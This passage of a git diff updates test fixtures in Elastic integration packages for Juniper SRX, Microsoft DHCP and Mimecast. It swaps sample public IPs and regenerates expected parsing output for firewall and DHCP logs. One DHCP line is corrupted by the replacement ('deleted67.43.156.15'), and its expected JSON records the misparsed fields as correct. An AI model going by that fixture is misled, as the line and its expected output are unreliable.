"category": [ "network" @@ -371,7 +371,7 @@ { "server": { "port": 51727, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" @@ -379,28 +379,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 51727, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { "port": 80, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.2.1.101" }, "juniper": { "srx": { @@ -426,18 +420,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.2.1.101", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "10.2.1.101" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760892266Z", - "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", + "ingested": "2021-12-10T10:16:22.252619600Z", + "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ "network" @@ -471,26 +465,20 @@ "user01" ], "ip": [ - "1.128.3.4" + "10.10.10.1" ] }, "log": { "level": "informational" }, "client": { - "ip": "1.128.3.4" + "ip": "10.10.10.1" }, "source": { "user": { "name": "user01" }, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.10.10.1" }, "juniper": { "srx": { @@ -503,8 +491,8 @@ }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760897966Z", - "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"1.128.3.4\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252625500Z", + "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", "category": [ @@ -525,39 +513,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "192.168.100.2" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 80, - "ip": "175.16.199.1" + "ip": "192.168.100.2" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01@testuser.com" }, - "ip": "1.128.3.4" + "ip": "192.168.2.3" }, "juniper": { "srx": { @@ -598,18 +568,18 @@ "user01@testuser.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.2.3", + "192.168.100.2" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.2.3" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760902084Z", - "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", + "ingested": "2021-12-10T10:16:22.252630500Z", + "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", "category": [ @@ -627,7 +597,7 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" @@ -635,31 +605,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01" }, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "juniper": { "srx": { @@ -695,18 +659,18 @@ "www.baidu.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.1.100", + "67.43.156.13" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760905410Z", - "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252636100Z", + "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -724,7 +688,7 @@ { "server": { "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" @@ -732,28 +696,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -790,18 +760,18 @@ "EICAR-Test-File" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760908616Z", - "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:16:22.252640600Z", + "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -819,7 +789,7 @@ { "server": { "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -827,28 +797,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "source": { "port": 58974, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -888,18 +852,18 @@ "datawrapper.dwcdn.net" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.1.1.100", + "67.43.156.14" ] }, "client": { "port": 58974, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760925328Z", - "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"58974\" destination-address=\"175.16.199.1\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", + "ingested": "2021-12-10T10:16:22.252646200Z", + "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", "category": [ @@ -915,7 +879,7 @@ { "server": { "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" @@ -923,28 +887,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { "port": 59075, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -984,18 +942,18 @@ "dsp.adfarm1.adition.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.1.1.100", + "67.43.156.13" ] }, "client": { "port": 59075, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760929926Z", - "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"59075\" destination-address=\"175.16.199.1\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", + "ingested": "2021-12-10T10:16:22.252650400Z", + "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", "action": "web_filter", @@ -1014,36 +972,30 @@ { "server": { "port": 58954, - "ip": "175.16.199.1" + "ip": "10.1.1.100" }, "log": { "level": "warning" }, "destination": { + "port": 58954, + "ip": "10.1.1.100" + }, + "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "port": 58954, - "ip": "175.16.199.1" - }, - "source": { - "port": 80, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -1079,18 +1031,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "10.1.1.100" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760933894Z", - "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252656300Z", + "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper_srx/manifest.yml b/packages/juniper_srx/manifest.yml index 21851b756c1..15fd2e16957 100644 --- a/packages/juniper_srx/manifest.yml +++ b/packages/juniper_srx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper_srx title: Juniper SRX -version: 1.0.0 +version: 1.0.1 description: Collect logs from Juniper SRX devices with Elastic Agent. categories: ["network", "security"] release: ga diff --git a/packages/microsoft/changelog.yml b/packages/microsoft/changelog.yml index a8224e4b069..e148fe8e1e2 100644 --- a/packages/microsoft/changelog.yml +++ b/packages/microsoft/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Add deprecation message in readme. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.8.3" changes: - description: Update title and description. Mark as deprecated in description. diff --git a/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log b/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log index 1327a595206..08d51f57759 100644 --- a/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log +++ b/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log @@ -6,12 +6,12 @@ 36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0 31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054 31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054 -35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000, -10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,, -10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 +35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000, +10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,, +10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0 30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0 -17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0 +17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0 55,04/19/20,12:43:54,Authorized(servicing),,domain.local, 60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local, 63,04/19/20,12:43:28,Restarting rogue detection,,, \ No newline at end of file diff --git a/packages/microsoft_dhcp/changelog.yml b/packages/microsoft_dhcp/changelog.yml index d50687ebbd3..a131b485324 100644 --- a/packages/microsoft_dhcp/changelog.yml +++ b/packages/microsoft_dhcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log index 1327a595206..08d51f57759 100644 --- a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log +++ b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log @@ -6,12 +6,12 @@ 36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0 31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054 31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054 -35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000, -10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,, -10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 +35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000, +10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,, +10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0 30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0 -17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0 +17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0 55,04/19/20,12:43:54,Authorized(servicing),,domain.local, 60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local, 63,04/19/20,12:43:28,Restarting rogue detection,,, \ No newline at end of file diff --git a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index ccc4b71c256..203de61ec97 100644 --- a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -6,7 +6,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761168700Z", + "ingested": "2021-12-09T13:41:22.171223700Z", "original": "01,04/19/20,13:11:13,Stopped,,,", "code": "01", "kind": "event", @@ -31,7 +31,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761216300Z", + "ingested": "2021-12-09T13:41:22.171228300Z", "original": "00,04/19/20,12:43:06,Started,,,", "code": "00", "kind": "event", @@ -60,7 +60,7 @@ "domain": "057182593757.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761225300Z", + "ingested": "2021-12-09T13:41:22.171233100Z", "original": "30,09/20/21,09:16:15,DNS Update Request,172.28.43.169,057182593757.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -95,7 +95,7 @@ "domain": "1-07.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761231800Z", + "ingested": "2021-12-09T13:41:22.171238100Z", "original": "30,09/20/21,09:16:09,DNS Update Request,172.28.53.173,1-07.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -130,7 +130,7 @@ "domain": "3-07.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761237600Z", + "ingested": "2021-12-09T13:41:22.171242700Z", "original": "32,09/20/21,09:16:03,DNS Update Successful,172.28.53.36,3-07.test.com,,,0,6,,,,,,,,,0", "code": "32", "kind": "event", @@ -165,7 +165,7 @@ "ip": "172.28.52.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761243Z", + "ingested": "2021-12-09T13:41:22.171249400Z", "original": "36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0", "code": "36", "kind": "event", @@ -200,7 +200,7 @@ "domain": "035856103966.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761249200Z", + "ingested": "2021-12-09T13:41:22.171254600Z", "original": "31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054", "code": "31", "kind": "event", @@ -235,7 +235,7 @@ "domain": "001100581357.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761254700Z", + "ingested": "2021-12-09T13:41:22.171260Z", "original": "31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054", "code": "31", "kind": "event", @@ -267,12 +267,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.1", + "ip": "192.168.2.1", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761260100Z", - "original": "35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000,", + "ingested": "2021-12-09T13:41:22.171266400Z", + "original": "35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000,", "code": "35", "kind": "event", "timezone": "America/New_York", @@ -296,12 +296,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.10", + "ip": "192.168.2.10", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761265100Z", - "original": "10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,,", + "ingested": "2021-12-09T13:41:22.171271800Z", + "original": "10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,,", "code": "10", "kind": "event", "timezone": "America/New_York", @@ -332,12 +332,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.20", + "ip": "192.168.2.20", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761271200Z", - "original": "10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0", + "ingested": "2021-12-09T13:41:22.171277Z", + "original": "10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0", "code": "10", "kind": "event", "timezone": "America/New_York", @@ -372,7 +372,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761277400Z", + "ingested": "2021-12-09T13:41:22.171281100Z", "original": "24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0", "code": "24", "kind": "event", @@ -407,7 +407,7 @@ "domain": "hostname.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761283200Z", + "ingested": "2021-12-09T13:41:22.171285200Z", "original": "30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -437,12 +437,9 @@ "ecs": { "version": "1.12.0" }, - "host": { - "ip": "8.8.8.8" - }, "event": { - "ingested": "2021-10-05T12:22:29.761288300Z", - "original": "17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0", + "ingested": "2021-12-09T13:41:22.171289600Z", + "original": "17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0", "code": "17", "kind": "event", "timezone": "America/New_York", @@ -454,14 +451,16 @@ ], "outcome": "success" }, - "message": "DNS record not deleted", + "message": "DNS record not deleted67.43.156.15", "microsoft": { "dhcp": { - "transaction_id": "0", - "result": "6", - "dns_error_code": "0" + "transaction_id": "6", + "relay_agent_info": "0" } }, + "user": { + "name": "0" + }, "tags": [ "preserve_original_event" ] @@ -475,7 +474,7 @@ "domain": "domain.local" }, "event": { - "ingested": "2021-10-05T12:22:29.761293300Z", + "ingested": "2021-12-09T13:41:22.171294600Z", "original": "55,04/19/20,12:43:54,Authorized(servicing),,domain.local,", "code": "55", "kind": "event", @@ -502,7 +501,7 @@ "domain": "domain.local" }, "event": { - "ingested": "2021-10-05T12:22:29.761298600Z", + "ingested": "2021-12-09T13:41:22.171299500Z", "original": "60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local,", "code": "60", "kind": "event", @@ -528,7 +527,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761303800Z", + "ingested": "2021-12-09T13:41:22.171305200Z", "original": "63,04/19/20,12:43:28,Restarting rogue detection,,,", "code": "63", "kind": "event", diff --git a/packages/microsoft_dhcp/manifest.yml b/packages/microsoft_dhcp/manifest.yml index 5aa2caf6749..f3dce383482 100644 --- a/packages/microsoft_dhcp/manifest.yml +++ b/packages/microsoft_dhcp/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: microsoft_dhcp title: Microsoft DHCP -version: 0.2.0 +version: 0.2.1 license: basic description: Collect logs from Microsoft DHCP with Elastic Agent. type: integration diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml index 4cdc4b2f00a..87d46bf2d0e 100644 --- a/packages/mimecast/changelog.yml +++ b/packages/mimecast/changelog.yml @@ -1,5 +1,8 @@ -# newer versions go on top - +- version: "0.0.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.0.2" changes: - description: Tweaking the dashboards diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log 